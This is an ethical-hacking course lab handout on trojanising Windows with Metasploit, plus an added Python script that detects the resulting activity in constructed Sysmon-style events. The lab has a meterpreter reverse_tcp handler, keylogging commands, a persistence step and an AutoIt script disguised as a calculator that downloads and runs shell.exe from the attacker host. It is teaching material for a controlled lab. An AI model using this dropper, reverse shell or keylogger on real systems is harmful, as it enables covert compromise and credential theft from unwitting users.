Lab 9 - 10
For submission: You must include screenshots and text explanation of the steps conducted in solving
the lab tasks.
Before starting this lab, make sure you have a Windows VM for VirtualBox. Once you do, configure the
network settings to be similar to the Kali machine you've been using and set up at least a NAT network.
To allow for bidirectional copy-paste, you can also install the Guest Additions, which is strongly
recommended.
Don't forget to restart the machine completely after installing the additions. Make sure you turn off the
firewall on the Windows VM.
1) The aim of the following exercise is to craft a malicious executable file (.exe) which contains a
command to connect to your Kali VM when executed. At first we will intentionally download and run
this executable file, but later we will try to disguise it.
________________________________________________________________________________________________________
CSCI369 Ethical Hacking - Lab 10 Exploiting Windows Machines and Creating Malicious Executables
Mohamed Ehsan Rizvan-7797965
Start your apache web server with the command service apache2 start
Start msfconsole on Kali, the console used to handle exploits, and enter the following commands to prepare
your machine to accept a reverse-shell connection when the Windows VM connects back.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Open a browser in the Windows machine and enter the following URL in the address bar to reach the
file: http://10.0.2.5/utility/shell.exe Turn off browser protection if needed.
Download and run the shell.exe file. On Kali you should see that you have established a connection with
the meterpreter.
Include a screenshot of the connection being established between the two machines and the
meterpreter console being open.
Create a file in the Downloads folder on Windows and attempt to read the file using
meterpreter.
2) Using the meterpreter utility, you can execute a variety of different exploits or attacks. We will try out
a keylogger. Type keyscan_start into the meterpreter on Kali, then go to the Windows VM, open
a browser and search for something. Once you're done, go back to Kali and type keyscan_dump.
3) A user is unlikely to manually download a suspicious shell.exe and then execute it. In the next
exercise you will download a script editor called AutoIt v3 and create an executable that pretends to
be the Windows calculator; when started, it downloads the malicious .exe file in the background,
then launches it alongside the calculator.
Download the application with the full installer on your Windows VM and install it:
https://www.autoitscript.com/site/autoit/downloads/
Start the SciTE Script Editor and paste in the following (replace [Kali IP] with your Kali VM's real IP address):
#include <InetConstants.au3>
#include <WinAPIFiles.au3>
$ps = Run("calc.exe")
; Download shell.exe from the Kali web server into the Downloads folder (background download).
InetGet("http://[Kali IP]/utility/shell.exe", "..\downloads\shell.exe", $INET_FORCERELOAD, $INET_DOWNLOADBACKGROUND)
Sleep(2000)
ShellExecute("..\downloads\shell.exe")
Save this script on the desktop, but before you run it, go to Kali, stop the previous connection and the
meterpreter prompt with the exit command, then re-run the exploit to wait for a new connection.
Compile the script you created on Windows. Check the Desktop for an executable file. Double-click it
and you should see that a calculator starts up and you have a connection on Kali's msfconsole.
The above will work, but it's unlikely that a user would have this script editor on their computer, and
hence they wouldn't be able to run this script. It is also obvious from the icon that this is not a
calculator. Start the Compile Script to .exe program from AutoIt and create an executable out of
this script (use an .ico file downloaded from the Web) so that it looks like a calculator.
Explain in your own words and in detail what the AutoIt script code that was provided for you does.
4) The user might find out later that this calculator was not legitimate and remove it. There is a way to
make the malicious shell executable automatically start when the operating system boots up. Use the
following commands in the msfconsole on Kali with the meterpreter utility to turn on persistence, then
reboot the machine.
Include a screenshot of the meterpreter connection dying, then reopening once the Windows VM
booted up again.
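The chain built across tasks 1, 3 and 4 (a look-alike executable that writes shell.exe into Downloads, launches it, the dropped binary connecting back to Kali, and an autorun entry so it survives a reboot) leaves a recognisable trail in host telemetry. The Python script below is an added example written for this page; it is not part of the lab handout, AutoIt or Metasploit. It runs three simple detection rules over constructed, Sysmon-style events. Every event record, path, PID, the address 10.0.2.5 and port 4444 are sample values constructed for the example, and the Run-key-plus-Temp-file persistence event is an assumption, since the handout does not show which persistence mechanism the meterpreter commands use.

```python
"""Host-side detection of the dropper / reverse-shell / persistence chain.

Added example: the events below are constructed to mirror the lab's steps
and are NOT real telemetry; the rules are illustrative, not a product.
"""

# Directories a normal user can write to; executables launching from, or
# being written into, these deserve a second look.
USER_WRITABLE = ("\\downloads\\", "\\desktop\\", "\\temp\\", "\\appdata\\")
EXEC_EXTENSIONS = (".exe", ".dll", ".scr", ".vbs", ".bat", ".ps1")


def in_user_writable(path: str) -> bool:
    """True if the path lies under a user-writable directory."""
    return any(seg in path.lower() for seg in USER_WRITABLE)


# Constructed telemetry, modelled loosely on Sysmon event types:
#   proc -> process creation      (pid, ppid, image)       [Sysmon ID 1]
#   net  -> outbound TCP connect  (pid, dst_ip, dst_port)  [Sysmon ID 3]
#   file -> file creation         (pid, target)            [Sysmon ID 11]
#   reg  -> registry value set    (pid, key, data)         [Sysmon ID 13]
# 10.0.2.5 and port 4444 are sample values; the Run-key persistence event
# is an assumption about how the persistence step is implemented.
SAMPLE_EVENTS = [
    {"t": 0, "type": "proc", "pid": 100, "ppid": 1,
     "image": r"C:\Users\lab\Desktop\calculator.exe"},          # look-alike dropper
    {"t": 1, "type": "proc", "pid": 101, "ppid": 100,
     "image": r"C:\Windows\System32\calc.exe"},                 # the real calculator
    {"t": 2, "type": "net", "pid": 100, "dst_ip": "10.0.2.5", "dst_port": 80},
    {"t": 3, "type": "file", "pid": 100,
     "target": r"C:\Users\lab\Downloads\shell.exe"},             # payload written
    {"t": 5, "type": "proc", "pid": 102, "ppid": 100,
     "image": r"C:\Users\lab\Downloads\shell.exe"},              # payload launched
    {"t": 6, "type": "net", "pid": 102, "dst_ip": "10.0.2.5", "dst_port": 4444},
    {"t": 9, "type": "reg", "pid": 102,
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svc",
     "data": r"C:\Users\lab\AppData\Local\Temp\svc.vbs"},        # autorun entry
    # Benign noise: a browser saves a document that is never executed.
    {"t": 12, "type": "proc", "pid": 200, "ppid": 1,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"t": 13, "type": "file", "pid": 200,
     "target": r"C:\Users\lab\Downloads\report.pdf"},
]


def detect(events, window=30):
    """Run the three rules over time-ordered events.

    Returns a list of (rule_name, offending_pid, detail) tuples.
    """
    findings = []
    procs = {}    # pid -> process-creation event
    dropped = {}  # lower-cased path -> (writer pid, time written)

    for ev in sorted(events, key=lambda e: e["t"]):
        kind = ev["type"]

        if kind == "proc":
            procs[ev["pid"]] = ev
            # Rule 1: a process writes an executable into a user-writable
            # directory and then launches it within `window` seconds.
            drop = dropped.get(ev["image"].lower())
            if drop and drop[0] == ev["ppid"] and ev["t"] - drop[1] <= window:
                parent = procs.get(ev["ppid"], {}).get("image", "<unknown>")
                findings.append(("drop_and_execute", ev["ppid"],
                                 f"{parent} wrote and launched {ev['image']}"))

        elif kind == "file":
            target = ev["target"].lower()
            if in_user_writable(target) and target.endswith(EXEC_EXTENSIONS):
                dropped[target] = (ev["pid"], ev["t"])

        elif kind == "net":
            # Rule 2: outbound connection from a binary in a user-writable
            # directory (fires on the dropper's download and on the reverse shell).
            proc = procs.get(ev["pid"])
            if proc and in_user_writable(proc["image"]):
                findings.append(("outbound_from_user_dir", ev["pid"],
                                 f"{proc['image']} -> {ev['dst_ip']}:{ev['dst_port']}"))

        elif kind == "reg":
            # Rule 3: autorun value pointing at a user-writable location.
            if "\\currentversion\\run" in ev["key"].lower() and in_user_writable(ev["data"]):
                findings.append(("run_key_persistence", ev["pid"],
                                 f"{ev['key']} = {ev['data']}"))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] pid={pid}: {detail}")
```

Each rule maps to one step of the lab: the drop-and-execute rule catches the compiled AutoIt script fetching and launching shell.exe, the outbound rule catches both that download and the reverse_tcp connection back to the handler, and the Run-key rule catches an autorun entry of the kind the persistence step would have to create. The benign Firefox download in the sample is there to show that a file merely landing in Downloads is not enough on its own; the rules key on execution and network behaviour.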